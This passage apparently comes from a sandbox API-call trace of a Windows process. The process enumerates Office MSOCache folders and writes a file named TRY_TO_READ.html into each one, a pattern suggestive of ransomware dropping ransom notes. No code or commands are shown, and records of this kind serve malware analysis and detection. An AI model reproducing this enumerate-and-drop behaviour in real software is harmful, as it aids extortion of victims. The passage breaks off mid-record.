1 [0065.551] CloseHandle (hObject=0x45c) returned 1 [0065.551] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x43e3f8 | out: hHeap=0x410000) returned 1 [0065.551] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x466798 | out: hHeap=0x410000) returned 1 [0065.551] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x466788 | out: hHeap=0x410000) returned 1 [0065.551] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x458748 | out: hHeap=0x410000) returned 1 [0065.551] FindNextFileW (in: hFindFile=0x48e770, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xf58ee8d0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xf6e0ec10, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xf6e0ec10, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="{90140000-00A1-0409-1000-0000000FF1CE}-C", cAlternateFileName="{92572~1")) returned 1 [0065.551] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x457f50 | out: hHeap=0x410000) returned 1 [0065.551] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4540d0 [0065.551] GetLastError () returned 0x0 [0065.551] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x80) returned 0x457f50 [0065.552] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4540d0 | out: hHeap=0x410000) returned 1 [0065.552] GetLastError () returned 0x0 [0065.552] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x60) returned 0x4b1740 [0065.552] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x60) returned 0x4b17a8 [0065.552] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b1740 | out: hHeap=0x410000) returned 1 [0065.552] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b17a8 | out: hHeap=0x410000) returned 1 [0065.552] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x80) returned 0x458748 [0065.552] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x20) returned 0x47f630 [0065.552] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x80) returned 0x4587d0 [0065.552] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x466788 [0065.552] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x466798 [0065.552] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4540d0 [0065.552] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x80) returned 0x458858 [0065.552] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4540d0 | out: hHeap=0x410000) returned 1 [0065.552] GetLastError () returned 0x0 [0065.552] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xc0) returned 0x43e3f8 [0065.552] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x458858 | out: hHeap=0x410000) returned 1 [0065.552] GetLastError () returned 0x0 [0065.552] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xb0) returned 0x473108 [0065.552] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\TRY_TO_READ.html" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0065.555] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x473108 | out: hHeap=0x410000) returned 1 [0065.555] WriteFile (in: hFile=0x45c, lpBuffer=0x479438*, nNumberOfBytesToWrite=0x549, lpNumberOfBytesWritten=0x367f454, lpOverlapped=0x0 | out: lpBuffer=0x479438*, lpNumberOfBytesWritten=0x367f454*=0x549, lpOverlapped=0x0) returned 1 [0065.556] WriteFile (in: hFile=0x45c, lpBuffer=0x1263190*, nNumberOfBytesToWrite=0xf30, lpNumberOfBytesWritten=0x367f454, lpOverlapped=0x0 | out: lpBuffer=0x1263190*, lpNumberOfBytesWritten=0x367f454*=0xf30, lpOverlapped=0x0) returned 1 [0065.556] WriteFile (in: hFile=0x45c, lpBuffer=0x1257fe8*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x367f454, lpOverlapped=0x0 | out: lpBuffer=0x1257fe8*, lpNumberOfBytesWritten=0x367f454*=0x4b, lpOverlapped=0x0) returned 1 [0065.556] CloseHandle (hObject=0x45c) returned 1 [0065.556] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x43e3f8 | out: hHeap=0x410000) returned 1 [0065.556] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x466798 | out: hHeap=0x410000) returned 1 [0065.556] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x466788 | out: hHeap=0x410000) returned 1 [0065.556] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4587d0 | out: hHeap=0x410000) returned 1 [0065.556] FindNextFileW (in: hFindFile=0x48e770, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xa5b30b20, ftCreationTime.dwHighDateTime=0x1d305f1, ftLastAccessTime.dwLowDateTime=0xa5bc90a0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xa5bc90a0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="{90140000-00B4-0409-1000-0000000FF1CE}-C", cAlternateFileName="{912E0~1")) returned 1 [0065.557] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x457f50 | out: hHeap=0x410000) returned 1 [0065.557] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4540d0 [0065.557] GetLastError () returned 0x0 [0065.557] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x80) returned 0x457f50 [0065.557] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4540d0 | out: hHeap=0x410000) returned 1 [0065.557] GetLastError () returned 0x0 [0065.557] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x60) returned 0x4b17a8 [0065.557] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x60) returned 0x4b1740 [0065.557] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b17a8 | out: hHeap=0x410000) returned 1 [0065.557] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b1740 | out: hHeap=0x410000) returned 1 [0065.557] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x80) returned 0x4587d0 [0065.557] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x20) returned 0x47f658 [0065.557] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x80) returned 0x458858 [0065.557] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x466788 [0065.557] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x466798 [0065.557] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4540d0 [0065.557] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x80) returned 0x4588e0 [0065.557] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4540d0 | out: hHeap=0x410000) returned 1 [0065.557] GetLastError () returned 0x0 [0065.557] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xc0) returned 0x43e3f8 [0065.557] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4588e0 | out: hHeap=0x410000) returned 1 [0065.557] GetLastError () returned 0x0 [0065.557] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xb0) returned 0x473108 [0065.557] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\TRY_TO_READ.html" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0065.560] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x473108 | out: hHeap=0x410000) returned 1 [0065.560] WriteFile (in: hFile=0x45c, lpBuffer=0x479438*, nNumberOfBytesToWrite=0x549, lpNumberOfBytesWritten=0x367f454, lpOverlapped=0x0 | out: lpBuffer=0x479438*, lpNumberOfBytesWritten=0x367f454*=0x549, lpOverlapped=0x0) returned 1 [0065.561] WriteFile (in: hFile=0x45c, lpBuffer=0x1263190*, nNumberOfBytesToWrite=0xf30, lpNumberOfBytesWritten=0x367f454, lpOverlapped=0x0 | out: lpBuffer=0x1263190*, lpNumberOfBytesWritten=0x367f454*=0xf30, lpOverlapped=0x0) returned 1 [0065.561] WriteFile (in: hFile=0x45c, lpBuffer=0x1257fe8*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x367f454, lpOverlapped=0x0 | out: lpBuffer=0x1257fe8*, lpNumberOfBytesWritten=0x367f454*=0x4b, lpOverlapped=0x0) returned 1 [0065.561] CloseHandle (hObject=0x45c) returned 1 [0065.562] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x43e3f8 | out: hHeap=0x410000) returned 1 [0065.562] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x466798 | out: hHeap=0x410000) returned 1 [0065.562] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x466788 | out: hHeap=0x410000) returned 1 [0065.562] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x458858 | out: hHeap=0x410000) returned 1 [0065.562] FindNextFileW (in: hFindFile=0x48e770, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xee38cbf0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xee803530, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xee803530, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="{90140000-00BA-0409-1000-0000000FF1CE}-C", cAlternateFileName="{90140~4")) returned 1 [0065.562] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x457f50 | out: hHeap=0x410000) returned 1 [0065.562] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4540d0 [0065.562] GetLastError () returned 0x0 [0065.562] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x80) returned 0x457f50 [0065.562] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4540d0 | out: hHeap=0x410000) returned 1 [0065.562] GetLastError () returned 0x0 [0065.562] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x60) returned 0x4b1740 [0065.562] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x60) returned 0x4b17a8 [0065.562] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b1740 | out: hHeap=0x410000) returned 1 [0065.562] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b17a8 | out: hHeap=0x410000) returned 1 [0065.562] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x80) returned 0x458858 [0065.562] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x20) returned 0x47f680 [0065.562] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x80) returned 0x4588e0 [0065.562] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x466788 [0065.562] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x466798 [0065.562] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4540d0 [0065.562] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x80) returned 0x458968 [0065.562] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4540d0 | out: hHeap=0x410000) returned 1 [0065.562] GetLastError () returned 0x0 [0065.562] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xc0) returned 0x43e3f8 [0065.562] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x458968 | out: hHeap=0x410000) returned 1 [0065.562] GetLastError () returned 0x0 [0065.562] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xb0) returned 0x473108 [0065.562] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\TRY_TO_READ.html" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0065.565] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x473108 | out: hHeap=0x410000) returned 1 [0065.565] WriteFile (in: hFile=0x45c, lpBuffer=0x479438*, nNumberOfBytesToWrite=0x549, lpNumberOfBytesWritten=0x367f454, lpOverlapped=0x0 | out: lpBuffer=0x479438*, lpNumberOfBytesWritten=0x367f454*=0x549, lpOverlapped=0x0) returned 1 [0065.566] WriteFile (in: hFile=0x45c, lpBuffer=0x1263190*, nNumberOfBytesToWrite=0xf30, lpNumberOfBytesWritten=0x367f454, lpOverlapped=0x0 | out: lpBuffer=0x1263190*, lpNumberOfBytesWritten=0x367f454*=0xf30, lpOverlapped=0x0) returned 1 [0065.566] WriteFile (in: hFile=0x45c, lpBuffer=0x1257fe8*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x367f454, lpOverlapped=0x0 | out: lpBuffer=0x1257fe8*, lpNumberOfBytesWritten=0x367f454*=0x4b, lpOverlapped=0x0) returned 1 [0065.567] CloseHandle (hObject=0x45c) returned 1 [0065.567] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x43e3f8 | out: hHeap=0x410000) returned 1 [0065.567] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x466798 | out: hHeap=0x410000) returned 1 [0065.567] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x466788 | out: hHeap=0x410000) returned 1 [0065.567] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4588e0 | out: hHeap=0x410000) returned 1 [0065.567] FindNextFileW (in: hFindFile=0x48e770, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xe7b68970, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xe8729610, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xe8729610, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="{90140000-0115-0409-1000-0000000FF1CE}-C", cAlternateFileName="{90140~1")) returned 1 [0065.567] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x457f50 | out: hHeap=0x410000) returned 1 [0065.567] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4540d0 [0065.567] GetLastError () returned 0x0 [0065.567] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x80) returned 0x457f50 [0065.567] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4540d0 | out: hHeap=0x410000) returned 1 [0065.567] GetLastError () returned 0x0 [0065.567] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x60) returned 0x4b17a8 [0065.567] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x60) returned 0x4b1740 [0065.567] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b17a8 | out: hHeap=0x410000) returned 1 [0065.567] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b1740 | out: hHeap=0x410000) returned 1 [0065.567] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x80) returned 0x4588e0 [0065.567] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x20) returned 0x47f6a8 [0065.567] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x80) returned 0x458968 [0065.567] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x466788 [0065.567] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x466798 [0065.567] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4540d0 [0065.567] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x80) returned 0x4589f0 [0065.567] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4540d0 | out: hHeap=0x410000) returned 1 [0065.567] GetLastError () returned 0x0 [0065.567] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xc0) returned 0x43e3f8 [0065.567] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4589f0 | out: hHeap=0x410000) returned 1 [0065.568] GetLastError () returned 0x0 [0065.568] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xb0) returned 0x473108 [0065.568] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\TRY_TO_READ.html" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0065.570] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x473108 | out: hHeap=0x410000) returned 1 [0065.570] WriteFile (in: hFile=0x45c, lpBuffer=0x479438*, nNumberOfBytesToWrite=0x549, lpNumberOfBytesWritten=0x367f454, lpOverlapped=0x0 | out: lpBuffer=0x479438*, lpNumberOfBytesWritten=0x367f454*=0x549, lpOverlapped=0x0) returned 1 [0065.571] WriteFile (in: hFile=0x45c, lpBuffer=0x1263190*, nNumberOfBytesToWrite=0xf30, lpNumberOfBytesWritten=0x367f454, lpOverlapped=0x0 | out: lpBuffer=0x1263190*, lpNumberOfBytesWritten=0x367f454*=0xf30, lpOverlapped=0x0) returned 1 [0065.571] WriteFile (in: hFile=0x45c, lpBuffer=0x1257fe8*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x367f454, lpOverlapped=0x0 | out: lpBuffer=0x1257fe8*, lpNumberOfBytesWritten=0x367f454*=0x4b, lpOverlapped=0x0) returned 1 [0065.571] CloseHandle (hObject=0x45c) returned 1 [0065.571] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x43e3f8 | out: hHeap=0x410000) returned 1 [0065.571] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x466798 | out: hHeap=0x410000) returned 1 [0065.571] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x466788 | out: hHeap=0x410000) returned 1 [0065.571] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x458968 | out: hHeap=0x410000) returned 1 [0065.571] FindNextFileW (in: hFindFile=0x48e770, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xfa13c510, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfc112b50, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfc112b50, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="{90140000-0117-0409-1000-0000000FF1CE}-C", cAlternateFileName="{9AFC7~1")) returned 1 [0065.571] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x457f50 | out: hHeap=0x410000) returned 1 [0065.571] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4540d0 [0065.571] GetLastError () returned 0x0 [0065.571] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x80) returned 0x457f50 [0065.571] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4540d0 | out: hHeap=0x410000) returned 1 [0065.571] GetLastError () returned 0x0 [0065.571] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x60) returned 0x4b1740 [0065.572] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x60) returned 0x4b17a8 [0065.572] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b1740 | out: hHeap=0x410000) returned 1 [0065.572] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b17a8 | out: hHeap=0x410000) returned 1 [0065.572] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x80) returned 0x458968 [0065.572] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x20) returned 0x47f6d0 [0065.572] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x80) returned 0x4589f0 [0065.572] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x466788 [0065.572] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x466798 [0065.572] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4540d0 [0065.572] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x80) returned 0x458a78 [0065.572] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4540d0 | out: hHeap=0x410000) returned 1 [0065.572] GetLastError () returned 0x0 [0065.572] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xc0) returned 0x43e3f8 [0065.572] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x458a78 | out: hHeap=0x410000) returned 1 [0065.572] GetLastError () returned 0x0 [0065.572] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xb0) returned 0x473108 [0065.572] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\TRY_TO_READ.html" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0065.574] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x473108 | out: hHeap=0x410000) returned 1 [0065.574] WriteFile (in: hFile=0x45c, lpBuffer=0x479438*, nNumberOfBytesToWrite=0x549, lpNumberOfBytesWritten=0x367f454, lpOverlapped=0x0 | out: lpBuffer=0x479438*, lpNumberOfBytesWritten=0x367f454*=0x549, lpOverlapped=0x0) returned 1 [0065.575] WriteFile (in: hFile=0x45c, lpBuffer=0x1263190*, nNumberOfBytesToWrite=0xf30, lpNumberOfBytesWritten=0x367f454, lpOverlapped=0x0 | out: lpBuffer=0x1263190*, lpNumberOfBytesWritten=0x367f454*=0xf30, lpOverlapped=0x0) returned 1 [0065.575] WriteFile (in: hFile=0x45c, lpBuffer=0x1257fe8*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x367f454, lpOverlapped=0x0 | out: lpBuffer=0x1257fe8*, lpNumberOfBytesWritten=0x367f454*=0x4b, lpOverlapped=0x0) returned 1 [0065.575] CloseHandle (hObject=0x45c) returned 1 [0065.576] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x43e3f8 | out: hHeap=0x410000) returned 1 [0065.576] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x466798 | out: hHeap=0x410000) returned 1 [0065.576] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x466788 | out: hHeap=0x410000) returned 1 [0065.576] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4589f0 | out: hHeap=0x410000) returned 1 [0065.576] FindNextFileW (in: hFindFile=0x48e770, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xfe09ced0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x18179b90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x18179b90, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="{91140000-0011-0000-1000-0000000FF1CE}-C", cAlternateFileName="{91140~1")) returned 1 [0065.576] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x457f50 | out: hHeap=0x410000) returned 1 [0065.576] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4540d0 [0065.576] GetLastError () returned 0x0 [0065.576] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x80) returned 0x457f50 [0065.576] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4540d0 | out: hHeap=0x410000) returned 1 [0065.576] GetLastError () returned 0x0 [0065.576] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x60) returned 0x4b17a8 [0065.576] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x60) returned 0x4b1740 [0065.576] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b17a8 | out: hHeap=0x410000) returned 1 [0065.576] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b1740 | out: hHeap=0x410000) returned 1 [0065.576] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x80) returned 0x4589f0 [0065.576] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x20) returned 0x47f6f8 [0065.576] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x80) returned 0x458a78 [0065.576] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x466788 [0065.576] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x466798 [0065.576] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4540d0 [0065.576] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x80) returned 0x458b00 [0065.576] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4540d0 | out: hHeap=0x410000) returned 1 [0065.576] GetLastError () returned 0x0 [0065.576] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xc0) returned 0x43e3f8 [0065.576] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x458b00 | out: hHeap=0x410000) returned 1 [0065.576] GetLastError () returned 0x0 [0065.576] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xb0) returned 0x473108 [0065.576] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\TRY_TO_READ.html" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0065.580] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x473108 | out: hHeap=0x410000) returned 1 [0065.580] WriteFile (in: hFile=0x45c, lpBuffer=0x479438*, nNumberOfBytesToWrite=0x549, lpNumberOfBytesWritten=0x367f454, lpOverlapped=0x0 | out: lpBuffer=0x479438*, lpNumberOfBytesWritten=0x367f454*=0x549, lpOverlapped=0x0) returned 1 [0065.581] WriteFile (in: hFile=0x45c, lpBuffer=0x1263190*, nNumberOfBytesToWrite=0xf30, lpNumberOfBytesWritten=0x367f454, lpOverlapped=0x0 | out: lpBuffer=0x1263190*, lpNumberOfBytesWritten=0x367f454*=0xf30, lpOverlapped=0x0) returned 1 [0065.581] WriteFile (in: hFile=0x45c, lpBuffer=0x1257fe8*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x367f454, lpOverlapped=0x0 | out: lpBuffer=0x1257fe8*, lpNumberOfBytesWritten=0x367f454*=0x4b, lpOverlapped=0x0) returned 